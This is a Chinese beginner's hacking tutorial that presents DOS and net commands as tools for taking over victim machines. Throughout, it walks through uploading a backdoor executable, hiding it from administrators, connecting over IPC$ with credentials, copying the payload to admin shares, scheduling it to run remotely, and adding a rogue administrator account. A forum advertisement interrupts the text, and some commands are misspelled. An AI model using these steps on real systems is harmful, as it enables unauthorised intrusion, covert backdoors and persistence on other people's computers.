黑客进阶-DOS命令

前言:
因工作与学习的原因，一直以来没有写关于菜鸟的初级技术文章，做为菜鸟站站长，实在感到惭愧！从现在开始，我将开始带领大家从菜鸟到老鸟的快乐旅程，祝愿大家早日成为老鸟，不要忘记了“中国菜鸟”哟！！！费话不多说了，请看正文：

提到DOS命令，恐怕大家都不陌生吧，但对于菜鸟来说，似乎很神秘似，很难理解。今天我将详细的介绍几个常用的DOS命令。主要是给刚入门的菜鸟和刚接触DOS命令的朋友们看看，高手就可以闪了！
DIR
显示当前盘下的所有文件夹和文件。如果你上传一个后门或服务端(如：happy.exe)到肉鸡的c:\winnt\system32下,想知道有没有上传成功。命令如下 :

C:\>DIR c:\winnt\system32\happy.exe
则会显示:
          2005-01-23  14:14          168,000 happy.exe
          1 个文件       168,000 字节              
          0 个目录  6,325,267,841 可用字节

如果你没有上传成功,则显示如下:
                           驱动器 C 中的卷没有标签。                      
                           卷的序列号是 2E43-0FFC
                           c:\winnt\system32\的目录                    
                           找不到文件

CD
改变当前目录命令如下:
                         C:\>cd winnt                 //进入winnt文件夹
                         C:\winnt>cd system32         //进入system32 文件夹
                         C:\winnt\system32>cd..       //回到上一级目录
                         C:\winnt>d:.                 //进入D盘
                         D:\>e:                       //进入E


del和deltree
DEL:删除文件.
命令如下:
            C:\>del c:\xx\cainiao.txt  //删除C盘的XX目录下的名叫cainiao的文件.
            C:\>del c:\xx\*.*          //删除C盘的XX目录下所有文件
deltree
这个命令不但能删除所有文件,连文件夹也删除            
            C:\>deltree c:\winnt       //删除C盘下的winnt所有文件和文件夹.


attrid
显示和更改文件或文件夹属性。其属性包括：隐藏用字母H表示；只读用R表示；存档用A表示；系统用S表示。改变一个文件或文件夹属性， “ + ”表示增加某个属性，“—”表示去掉某个属性。如果把后门或服务端到上传肉鸡的c:\winnt\system32下，在进入了肉鸡的CMD，为了不让管理员发现，我们可以给其添加隐藏属性。 命令如下:
      C:\>attrid +h   c:\winnt\system32\happy.exe   //添加happy.exe的隐藏属性
      C:\>attrid -h   c:\winnt\system32\happy.exe   //去掉happy.exe的隐藏属性

copy
复制一个或多个文件到其它目录比如你把C盘下一个叫happy.exe文件复制到D盘的cainiao文件夹下,
              
                        C:\>copy c:\happy.exe  d:\cainiao\happy.exe
如果已经肉鸡建立了IPC$连接，而且肉鸡开放了共享，命令如下:
                    
                   C:\>copy c:\happy.exe    \\肉鸡IP\c$


type
显示文件内容例如想显示C:\cainiao.txt文件。命令如下:
           C:\>type c:\cainiao.txt
ps:我是说真的！现在我的技术网站刚刚起步中……
大家可以看看http://bbs.happyes.com，真诚希望大家的加入！
经我分析大多数电脑答疑论坛里面新手提问，甚至是一些老鸟的求助留言。回复的人很少。有80%得不到回复。（不包括灌水，而是真正需要解决的一些问题）.正所谓有需求，才会有市场。面对目前电脑答疑门户竞争下，我们想要打败强者，必须拥有自己核心即独特的竞争优势。我们大家一起来组建一个真正的菜鸟++帮助网++，菜鸟在我们这里的每一个问题都可以得到很好的回答。
C:\>
因此也可以通过它来查看肉鸡是什么操作系统，命令如下： 
                    C:\>type c:\boot.ini
                   [boot loader]
                   imeout=3
                   default=C:\
                   [operating systems]
                  C:\=Microsoft Windows
                  multi(0)disk(0)rdisk(0)partition(3)\WINDOWS="Microsoft Windows XP          
                  Professional" /fastdetect /NoExecute=OptIn
我用的是win 98和XP双系统,默认启动是win 98，启动选择菜单显示时间为3秒！

ping
可以检测网络的连通性，可以通过域名来获取IP地址！命令格式：                               ping  +  ip地址                               ping   +  域名
命令如下：
C:\>ping www.happyes.com
Pinging www.happyes.com [211.01.15.130] with 32 bytes of data:
Reply from 211.01.15.130: bytes=32 time<1ms TTL=128
Reply from 211.01.15.130: bytes=32 time<1ms TTL=128
Reply from 211.01.15.130: bytes=32 time<1ms TTL=128
Reply from 211.01.15.130: bytes=32 time<1ms TTL=128
Ping statistics for 211.01.15.130:
Packets: Sent = 4, Received = 4, Lost = 0 (0% loss),
Approximate round trip times in milli-seconds:
Minimum = 0ms, Maximum = 0ms, Average = 0ms
由Ping域名：www.happyes.cm得到其主机IP是211.101.15.130，从TTL=128,大略看出使用的是windows操作系统。TTL值在128左右的是windows操作系统,TTL值在225左右的大多数是unix类系统。管理员也可以通过改注册表来修改TTL值。

net use
这个命令主要做IPC$连接，命令如下：
net use \\肉鸡ip\ipc$ "密码"  /user:"用户名"
连接成功后,上传后门或服务端,(如你c:\happy.exe).
copy c:\happy.exe  \\肉鸡ip\c$   //肉鸡必须开放共享,你才能上传.否则无法上传成功.
net time \\肉鸡ip                        //看一下肉鸡的时间
at  \\肉鸡ip  15:00  happy.exe    //在15:00运行happy.exe

net user
查看用户或新建一个计算机用户，命令如下：
C:\>net user
\\xp 的用户帐户
---------------------------------------------------------------------
Guest                    chinaliu                  HelpAssistant
SUPPORT_388945a0         administrator
命令成功完成。
C:\>

这是我的计算机上所有的用户。新建一个计算机用户的命令如下：
C:\>net user cainiao 123456 /add                             //新建一个用户名：cainiao密码：123456的用户命令成功完成。
C:\>net localgroup administrators cainiao /add           //把cainiao用户提升为管理员命令成功完成。                        
下面我们看一下是否建立用户成功：
C:\>net user
\\xp 的用户帐户
---------------------------------------------------------------------
Guest                    chinaliu                  HelpAssistant
SUPPORT_388945a0         administrator    cainiao
命令成功完成。
好了，我们来查看一下计算机上所有管理帐号，有没有cainiao用户，命令如下：
C:\>net localgroup administrators
别名     administrators
注释     管理员对计算机/域有不受限制的完全访问权
成员
------------------------------------------------------
chinaliu
cainiao

命令成功完成。


net start（stop）
启动(停止)某些服务，查看我的电脑启用了什么服务。命令如下：            
net start telnet   //启动telnet服务      
net stop telnet   //停止telnet服务      
net start            //电脑已经启动了什么服务
关于用法，大家不防可以自己试一试！^ _ ^

net share
查看默认共享。命令如下：
C:\Documents and Settings\Administrator>net share
IPC$                           远程IPC
D$           D:\               默认共享                          
C$           C:\               默认共享F$          
F:\          F:\               默认共享                          
ADMIN$       C:\WINNT          远程管理                          
E$           E:                默认共享                          
命令成功完成。

net view
查看非默认共享。命令如下：C:\Documents and Settings\Administrator>net view
服务器名称            注释
------------------------------------------------------------------------------
\\A83                                                                          
\\A84                                                                        
\\Server                                                                          
命令成功完成。
C:\Documents and Settings\Administrator>

好了，忙了一下午，先写这么多吧！DOS命令是最基础，也是很重要的东东，大家如果想当一名老鸟，DOS命令是必须熟的！第一次写菜鸟初级文章，难免有误之处，还请高手与大家批评指出！